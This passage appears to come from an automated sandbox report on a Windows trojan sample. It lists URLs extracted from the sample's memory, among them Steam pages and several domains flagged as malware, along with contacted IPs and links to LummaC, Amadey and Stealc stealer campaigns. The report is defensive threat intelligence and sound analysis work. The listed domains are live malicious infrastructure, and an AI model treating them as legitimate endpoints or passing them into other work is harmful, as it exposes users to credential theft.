                                                                                                              http://store.steampowered.com/privacy_agreement/SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725392835.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://wrathful-jammy.cyou/SkaKk8Z1J0.exe, 00000000.00000003.1356087080.000000000084E000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725301911.0000000000852000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://steamcommunity.com:443/profiles/76561199724331900SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000834000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356259424.0000000000836000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://store.steampowered.com/points/shop/SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://sketchfab.comSkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://lv.queniujq.cnSkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://steamcommunity.com/profiles/76561199724331900/inventory/SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725392835.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356655281.000000000080A000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.youtube.com/SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://store.steampowered.com/privacy_agreement/SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amSkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.google.com/recaptcha/SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://checkout.steampowered.com/SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://awake-weaves.cyou/apiUZSkaKk8Z1J0.exe, 00000000.00000003.1356087080.000000000084E000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725301911.0000000000852000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          		unknown
                                                                                                                                          https://store.steampowered.com/;SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://store.steampowered.com/about/SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://community.fasSkaKk8Z1J0.exe, 00000000.00000002.1725378760.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355984707.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356675381.00000000008A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://steamcommunity.com/my/wishlist/SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://effecterectz.xyz/zSkaKk8Z1J0.exe, 00000000.00000003.1311985748.0000000000856000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  		unknown
                                                                                                                                                  https://help.steampowered.com/en/SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://steamcommunity.com/market/SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://store.steampowered.com/news/SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://store.steampowered.com/subscriber_agreement/SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725392835.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725392835.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356655281.000000000080A000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://effecterectz.xyz:443/api0uSkaKk8Z1J0.exe, 00000000.00000003.1312168792.0000000000891000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            		unknown
                                                                                                                                                            https://recaptcha.net/recaptcha/;SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://steamcommunity.com/discussions/SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://debonairnukk.xyz/apiSkaKk8Z1J0.exe, 00000000.00000003.1356087080.000000000084E000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725301911.0000000000852000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://store.steampowered.com/stats/SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://medal.tvSkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://broadcast.st.dl.eccdnx.comSkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://store.steampowered.com/steam_refunds/SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://store.steampowered.com/legalDSkaKk8Z1J0.exe, 00000000.00000002.1725378760.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355984707.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356675381.00000000008A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://steamcommunity.com/workshop/SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://login.steampowered.com/SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbbSkaKk8Z1J0.exe, 00000000.00000003.1356087080.000000000084E000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://store.steampowered.com/legal/SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725392835.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&aSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://steamcommunity.com/tXSkaKk8Z1J0.exe, 00000000.00000003.1356087080.000000000084E000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725301911.0000000000852000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://effecterectz.xyz/4SkaKk8Z1J0.exe, 00000000.00000003.1311985748.0000000000856000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://recaptcha.netSkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://upx.sf.netAmcache.hve.10.drfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://effecterectz.xyz/SkaKk8Z1J0.exe, 00000000.00000003.1311985748.0000000000856000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://effecterectz.xyz/api2SkaKk8Z1J0.exe, 00000000.00000003.1311985748.0000000000856000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    https://store.steampowered.com/SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://127.0.0.1:27060SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgSkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356675381.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725212264.0000000000818000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high

                                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            45.77.249.79
                                                                                                                                                                                                                            		immureprech.bizUnited States
                                                                                                                                                                                                                            		20473AS-CHOOPAUSfalse
                                                                                                                                                                                                                            104.131.68.180
                                                                                                                                                                                                                            		deafeninggeh.bizUnited States
                                                                                                                                                                                                                            		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                            104.121.10.34
                                                                                                                                                                                                                            		steamcommunity.comUnited States
                                                                                                                                                                                                                            		16625AKAMAI-ASUSfalse

                                                                                                                                                                                                                            General Information

                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                            Analysis ID:1576507
                                                                                                                                                                                                                            Start date and time:2024-12-17 08:13:12 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 5m 33s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:18
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                            Sample name:SkaKk8Z1J0.exe
                                                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                                                            Original Sample Name:6997ff1992058c43f1355563c6a5a7af.exe
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.troj.evad.winEXE@3/9@10/3
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                            • Successful, ratio: 98%
                                                                                                                                                                                                                            • Number of executed functions: 16
                                                                                                                                                                                                                            • Number of non-executed functions: 234
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 2.16.164.105, 2.16.164.97, 199.232.214.172, 52.168.117.173, 13.107.246.63, 20.109.210.53, 40.126.53.6
                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, time.windows.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • VT rate limit hit for: SkaKk8Z1J0.exe

                                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                            02:14:08API Interceptor6x Sleep call for process: SkaKk8Z1J0.exe modified
                                                                                                                                                                                                                            03:32:28API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                                            IPs

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            45.77.249.79UoktqWamLR.exeGet hashmaliciousAZORultBrowse
                                                                                                                                                                                                                            • ehzwq.shop/erd/mac/index.php
                                                                                                                                                                                                                            RgZaLjgCto.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                                                            • uyhgqunqkxnx.pw/EiDQjNbWEQ/
                                                                                                                                                                                                                            java.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                                                            • uyhgqunqkxnx.pw/EiDQjNbWEQ/
                                                                                                                                                                                                                            104.131.68.180java.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                                                            • uyhgqunqkxnx.pw/EiDQjNbWEQ/
                                                                                                                                                                                                                            104.121.10.34file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                    PHuHRcCpaJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      EI0WLvSYFS.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        b6FArHy7yA.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                              fukjsefsdfh.exeGet hashmaliciousLummaC StealerBrowse

                                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                immureprech.bizfile.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                • 172.67.207.38
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 172.67.207.38
                                                                                                                                                                                                                                                wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 104.21.22.222
                                                                                                                                                                                                                                                AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 172.67.207.38
                                                                                                                                                                                                                                                I37faEaz1K.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 172.67.207.38
                                                                                                                                                                                                                                                steamcommunity.comfile.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                • 23.37.186.133
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 23.37.186.133
                                                                                                                                                                                                                                                njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                • 104.102.49.254
